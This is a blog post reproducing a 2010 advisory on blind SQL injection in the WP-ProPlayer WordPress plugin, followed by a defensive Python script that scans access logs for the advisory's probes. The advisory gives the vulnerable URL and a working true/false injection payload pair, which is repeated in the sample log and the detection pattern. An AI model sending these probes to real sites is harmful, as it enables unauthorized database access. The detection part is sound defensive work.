Friday, December 10, 2010

WP-ProPlayer Plugin Blind SQL Injection

<-------

WP-ProPlayer Plugin Blind SQL Injection
By Ca0s `

Visit:
        st4ck-3rr0r.blogspot.com
        ka0-labs.org
    Shouts @
        evilzone.org
        elhacker.net
        diosdelared.com

------->
<-------

Software: ProPlayer <= 4.7.7
URL:
 http://wordpress.org/extend/plugins/proplayer/
 http://isagoksu.com/proplayer-wordpress-plugin/
Vuln: Blind SQL Injection ->
 /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
 /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

Detail: some servers convert ' to %27, so the requests above do not work in that form.
------->
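From the defender's side, the two requests above are the classic true/false pair of a boolean-based blind injection: the same playlist id with a tautology and with a contradiction appended, and the page only leaks anything if the two responses differ. The following Python script is an added example, not part of the advisory and not the plugin's code: it scans Apache-style access-log lines for requests to playlist-controller.php, percent-decodes the pp_playlist_id value (so a probe sent as %27 and one sent with a literal quote, the point raised in the Detail line, normalise to the same text), flags values that are not a plain numeric id, and reports clients whose flagged probes were answered with different body sizes. The log lines, client addresses and response sizes are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the advisory): one normal
# request, the two boolean probes from the advisory (one with the quote sent as
# %27, one with a literal quote), and an unrelated request from another client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2010:12:00:01 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3 HTTP/1.1" 200 512
203.0.113.5 - - [10/Dec/2010:12:00:02 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3%27)+and+(%27a%27=%27a HTTP/1.1" 200 512
203.0.113.5 - - [10/Dec/2010:12:00:03 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=3')+and+('a'='b HTTP/1.1" 200 17
198.51.100.7 - - [10/Dec/2010:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

ENDPOINT = "/wp-content/plugins/proplayer/playlist-controller.php"
PARAM = "pp_playlist_id"

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A boolean operator followed by a comparison of two quoted string literals,
# e.g. ") and ('a'='a", which is the shape of the probes in the advisory.
BOOLEAN_PROBE_RE = re.compile(r"\b(and|or)\b\s*\(?\s*'[^']*'\s*=\s*'", re.IGNORECASE)


def parse_line(line):
    """Return {'ip', 'value', 'size'} for a request to ENDPOINT carrying PARAM, else None.

    parse_qs percent-decodes the value and turns '+' into spaces, so %27 and a
    literal quote both end up as ' before classification.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != ENDPOINT:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if PARAM not in query:
        return None
    size = m.group("size")
    return {
        "ip": m.group("ip"),
        "value": query[PARAM][0],
        "size": int(size) if size != "-" else 0,
    }


def classify(value):
    """'ok' for a plain numeric id, 'blind-sqli-probe' for the boolean pattern, else 'malformed'."""
    if value.isdigit():
        return "ok"
    if BOOLEAN_PROBE_RE.search(value):
        return "blind-sqli-probe"
    return "malformed"


def scan_log(text):
    """Classify every request to the endpoint.

    Returns a list of (line_no, ip, decoded_value, verdict, response_size).
    """
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        findings.append((n, rec["ip"], rec["value"], classify(rec["value"]), rec["size"]))
    return findings


def boolean_pairs(findings):
    """Clients whose flagged probes were answered with more than one response size.

    A true/false pair that produces different body lengths is what makes a
    boolean-based blind injection usable, so it is the signal worth alerting on.
    """
    sizes = {}
    for _, ip, _, verdict, size in findings:
        if verdict == "blind-sqli-probe":
            sizes.setdefault(ip, set()).add(size)
    return sorted(ip for ip, seen in sizes.items() if len(seen) > 1)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for finding in results:
        print(finding)
    print("clients with differential probes:", boolean_pairs(results))
```

The classifier is deliberately strict about what "ok" means: the parameter is a playlist id, so anything other than a run of digits is at least malformed and worth a look, whatever the probe syntax. Running the script on the constructed log flags lines 2 and 3 and reports 203.0.113.5 as the client whose true and false probes were answered with different sizes (512 versus 17).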